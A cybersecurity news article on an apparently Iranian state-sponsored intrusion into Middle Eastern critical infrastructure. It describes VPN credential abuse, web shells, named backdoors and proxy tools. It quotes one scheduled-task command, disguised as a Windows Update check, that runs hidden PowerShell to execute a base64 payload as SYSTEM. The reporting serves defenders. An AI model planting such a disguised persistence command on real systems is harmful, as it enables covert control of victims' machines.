A sophisticated cyber intrusion targeting critical national infrastructure in the Middle East has been uncovered, with evidence pointing to an Iranian state-sponsored threat group.

The attack, which persisted from May 2023 to February 2025, showcases advanced tactics and a concerning focus on essential services.

Initial investigation reveals signs of compromise dating back as early as May 2021, indicating a long-term strategic operation designed for intelligence gathering and potential prepositioning for future attacks.

The threat actors initially gained access through compromised VPN credentials, subsequently deploying multiple web shells on public-facing servers to establish footholds within the victim’s environment.

From these initial access points, the attackers methodically expanded their presence, installing sophisticated backdoors including Havoc, HanifNet, HXLibrary, and NeoExpressRAT.

These tools enabled comprehensive command execution, file operations, and critical system discovery capabilities across the compromised infrastructure.

Fortinet researchers identified particularly concerning efforts by the attackers to bypass network segmentation, a security measure specifically designed to prevent such lateral movement.

The adversaries employed a chain of open-source proxying tools-including plink, Ngrok, glider proxy, and ReverseSocks5-to traverse security boundaries and penetrate deeper into restricted network segments, including those potentially connected to operational technology (OT) environments.

Novel Malware Deployment

Among the most technically significant aspects of this intrusion was the deployment of custom malware variants.

The HanifNet backdoor represents a sophisticated .NET-based tool designed for maintaining persistent access to compromised systems.

Its communication with command and control infrastructure was carefully obfuscated to evade traditional security monitoring.

Analysis of its execution pattern shows how it implements scheduled tasks to blend with legitimate Windows processes:-

schtasks /create /tn "\Microsoft\Windows\WindowsUpdate\UpdateCheck" /tr "C:\Windows\System32\mshta.exe javascript:eval('new ActiveXObject(\'WScript.Shell\').Run(\'powershell -w h -c iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\\\'BASE64_ENCODED_PAYLOAD\\\')))\',0);window.close()')" /sc DAILY /st 15:45 /ru "SYSTEM"

The attackers also employed HXLibrary, a malicious IIS module providing deep system control, and NeoExpressRAT, a Golang-based backdoor with hardcoded C2 communication capabilities.

These tools demonstrate the evolving capability set of Iranian cyber operators and highlight the continued threat to critical infrastructure globally.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.